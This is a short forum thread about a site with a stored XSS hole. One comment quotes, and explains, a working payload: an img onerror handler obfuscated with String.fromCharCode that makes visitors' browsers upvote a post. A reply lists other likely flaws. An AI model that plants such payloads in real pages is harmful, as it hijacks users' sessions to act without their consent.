zlacker

[parent] [thread] 1 comments
1. Antony+(OP)[view] [source] 2023-06-13 13:54:21
Yes, the site is vulnerable to XSS, couple of interesting payloads on there so far

The current top post uses this XSS to have users upvote it:

<img src="a" onerror="soci.postData(String.fromCharCode(112,111,115,116,116,97,103,47,97,100,100,45,118,111,116,101),{post:String.fromCharCode(120),tag:String.fromCharCode(120)})">

Which sends a POST request to `posttag/add-vote` for the post labeled `x`

replies(1): >>lyu072+8m
2. lyu072+8m[view] [source] 2023-06-13 15:25:22
>>Antony+(OP)
I suppose that makes sense if you get payed for upvotes, stored xss is probably just the most low hanging fruit, if they messed that up I'd expect everything from csrf, clickjacking, sqli and more, everyone has the incentive to look and exploit. They should probably get a thorough white box review.
[go to top]